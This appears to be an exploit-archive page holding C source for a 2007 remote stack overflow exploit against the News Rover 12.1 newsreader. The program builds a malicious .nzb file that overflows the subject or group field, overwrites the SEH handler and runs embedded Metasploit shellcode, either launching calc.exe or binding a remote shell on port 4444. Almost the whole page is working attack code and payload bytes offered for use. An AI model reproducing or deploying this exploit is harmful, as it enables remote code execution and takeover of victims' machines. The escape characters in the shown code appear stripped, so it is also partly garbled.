[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : News Rover 12.1 Rev 1 Remote Stack Overflow Exploit
# Published : 2007-02-20
# Author : Marsu
# Previous Title : Nortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit
# Next Title : ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2 


/*********************************************************************************************
*                                                                                             *
*                    News Rover 12.1 Rev 1 Remote Stack Overflow exploit                      *
*                 Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr>                  *
*                                                                                             *
*             Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P              *
*********************************************************************************************/

#include "stdlib.h"
#include "stdio.h"
#include "string.h"


/* win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* BAD CHARS ARE 0x00 0x3c 0x3d 0x3e 0x3f 0x0a 0x0d 0x22 0x25 0x26 0xA7 0x8a. Maybe more... */
char calcshellcode[] =
"x2bxc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa4"
"xb2x82x70x83xebxfcxe2xf4x58x5axc6x70xa4xb2x09x35"
"x98x39xfex75xdcxb3x6dxfbxebxaax09x2fx84xb3x69x39"
"x2fx86x09x71x4ax83x42xe9x08x36x42x04xa3x73x48x7d"
"xa5x70x69x84x9fxe6xa6x74xd1x57x09x2fx80xb3x69x16"
"x2fxbexc9xfbxfbxaex83x9bx2fxaex09x71x4fx3bxdex54"
"xa0x71xb3xb0xc0x39xc2x40x21x72xfax7cx2fxf2x8exfb"
"xd4xaex2fxfbxccxbax69x79x2fx32x32x70xa4xb2x09x18"
"x98xedxb3x86xc4xe4x0bx88x27x72xf9x20xccx42x08x74"
"xfbxdax1ax8ex2exbcxd5x8fx43xd1xe3x1cxc7x9cxe7x08"
"xc1xb2x82x70";
 
/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
char bindshellcode[] =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
"x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
"x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
"xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
"x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
"x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
"xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
"xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
"x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
"x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
"xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
"xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
"x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
"x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
"xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
"x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
"xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
"x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
"x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
"x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
"x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
"xa4x7dx2ex7fx27x82xf8x80";




char nzbheader[]="<?xml version="1.0" encoding="iso-8859-1" ?>n"
				 "<!DOCTYPE nzb PUBLIC "-//newzBin//DTD NZB 1.0//EN" "http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd">n"
				 "<!-- NZB Generated by MarsupilamiPowa -->n"
				 "<nzb xmlns="http://www.google.com">nn";


char nzbend[]="</segment>n"
"</segments>n"
"</file>n"
"</nzb>n";

char defaultfilename[]="file.nzb";

int main(int argc, char* argv[]) {

FILE *file;
char * pad;
int type=0;
int mode=0;
char *filename;
char *myshell;

printf("[+] NZB exploit for News Rovern");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
if (argc>3)	{
	type=atoi(argv[1]);
	filename=argv[3];
	mode=atoi(argv[2]);
	if (!mode)
		myshell=calcshellcode;
	else
		myshell=bindshellcode;
}
else {
	printf("[+] Usage: %s type mode file.nzbnn",argv[0]);
	printf("[+] type is ...n");
	printf("0: News Rover v12.1,  Rev. 1 Subject stack overflow. Works on XP SP2 FRn");
	printf("1: News Rover v12.1,  Rev. 1 Group stack overflow. Works on XP SP2 FRnn");
	printf("[+] mode is n");
	printf("0: Spawns calc.exen");
	printf("1: Binds to 4444nn");
	printf("[+] Ex: %s 0 0 file.nzb",argv[0]);

	return 0;
}

file=fopen(filename,"wb");

if (type==0)
{
	fprintf(file,nzbheader);
	fprintf(file,"<file poster="Poster" date="1170609233"nsubject="");
	pad = (char*)malloc(sizeof(char)*3000+strlen(myshell));
	memset(pad,'A',3000);
	memcpy(pad+2022,"xebx15x90x90",4);  //jmp short +15
	memcpy(pad+2026,"x2ax02xfcx7f",4);  //pop pop ret in ??? defeats SP2 SEH call protection. Have a look to your memory and change this address if it doesnt work.
	memset(pad+2030,0x90,15);				//nop padding
	memcpy(pad+2045,myshell,strlen(myshell));
	memset(pad+2045+strlen(myshell),0,1);
	memset(pad+3000,0,1);
	fprintf(file,pad);
	fprintf(file,"">n<groups><group>some group</group></groups>n<segments>n<segment bytes="30" number="1">some name");
	fprintf(file,nzbend);
	fclose(file);
}
else if (type==1)
{
	fprintf(file,nzbheader);
	fprintf(file,"<file poster="Poster" date="1170609233" subject="Some Subj">n");
	fprintf(file,"<groups><group>alt.bdffs</group></groups>n<segments>n<segment bytes="30" number="1">no matter the name</segment>n</segments>n</file>");
	fprintf(file,"nn<file poster="Poster" date="1170609233" subject="Some Subj">n");
	fprintf(file,"<groups><group>");
	
	pad = (char*)malloc(sizeof(char)*100);
	memset(pad,'A',100);
	memcpy(pad,"x90xb8x33x33x33x33x2Dx13x27x33x33x8Bx04x04x40xFFxD0",17); //We will use data stuck in Segment to exec our code because we dont have much place here
	memcpy(pad+94,"x53xF1xD1x770",5); //call ebx in USER32.dll
	fprintf(file,pad);
	fprintf(file,"</group></groups>n<segments>n<segment bytes="30" number="1">");
	pad=(char *)realloc(pad,sizeof(char)*3000);
	memset(pad,'A',3000);
	memcpy(pad+1500,myshell,strlen(myshell));
	memset(pad+3000,0,1);
	fprintf(file,pad);
	fprintf(file,nzbend);
	fclose(file);
}


printf("[+] File generated! Have funn");
return 0;
}

// www.Syue.com [2007-02-20]